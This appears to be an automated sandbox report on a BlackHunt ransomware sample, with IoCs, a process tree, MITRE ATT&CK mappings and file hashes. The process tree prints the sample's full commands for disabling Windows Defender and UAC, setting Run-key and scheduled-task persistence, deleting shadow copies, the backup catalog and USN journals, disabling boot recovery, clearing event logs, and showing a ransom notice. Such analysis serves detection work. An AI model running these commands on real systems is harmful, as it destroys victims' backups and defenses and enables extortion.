System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe"C:\Users\Admin\AppData\Local\Temp\a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2148 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2684
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2700
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2936
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2868
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2284
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1232
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3012
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2992
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3008
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2920
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2852
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:292
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2328
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe" /F2⤵PID:3004
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe" /F3⤵
- Creates scheduled task(s)
PID:1608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2012
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1728
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2824
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:684
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:796
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1000
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:812
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3064
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:576
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:964
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3752
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:836
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3864
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2768
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3616
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1864
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3836
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2100
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3612
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3296
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3772
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4040
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:876
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:652
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3744
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1696
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:4016
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3352
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:1440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:352
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:312
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3820
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2332
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:472
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\a45cebb05b221e05c88f56f1caebd3fd606acf63372e3dbf78f393b820a36d16.exe"2⤵
- Deletes itself
PID:3476 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2636
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3468
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2520
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2680
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50866714f368bd4e6f72b7092a55c6246
SHA1d7466b85b31c210af22adaa681061123d15605fe
SHA256d70e5e706704024bf607ee3dff0b9b46f4564daae03e8794cd65dda82256ea20
SHA51272ebdf7c877ffa6f8c46a488b12d524747b6e9964a77285002554b6e71a061146719c93c40e9d413824e2c106496b622219d58122a1698832af0348acb6e038b
-
Filesize
12KB
MD57bb8bf813758266b16752713dd31a442
SHA142684fe54f340defe10537bc6bb675e04216e7d9
SHA25645b83b61e2f2e8aa3ab7829f62c73b7d29c9dd404ed92bfea91002225941b83d
SHA512c3e3cd89c54ee2c63383bb6be7851dafd317eedfa428f226cac211d749687967f4e623fa9e2d507d17f48573cae2905c4c93b6134d6138efcb840bb75790c7e5
-
Filesize
684B
MD50f799ff3df30a974d20493511e7f2d1e
SHA13919db39f89c782bc9804b9be5efb4073d3bb423
SHA256842129bd3cc2f826092b08dd03384afac6a8c04b5fabcca41586b7e192aceb47
SHA51221b8da2e560f524e8d56ee7d5ddc9fb74d9d93faff0c9f8f50c17fe560457679478a8471e67ceb68a92e984771d3a5268d8b7295d3ecc274d3047c0fac61f011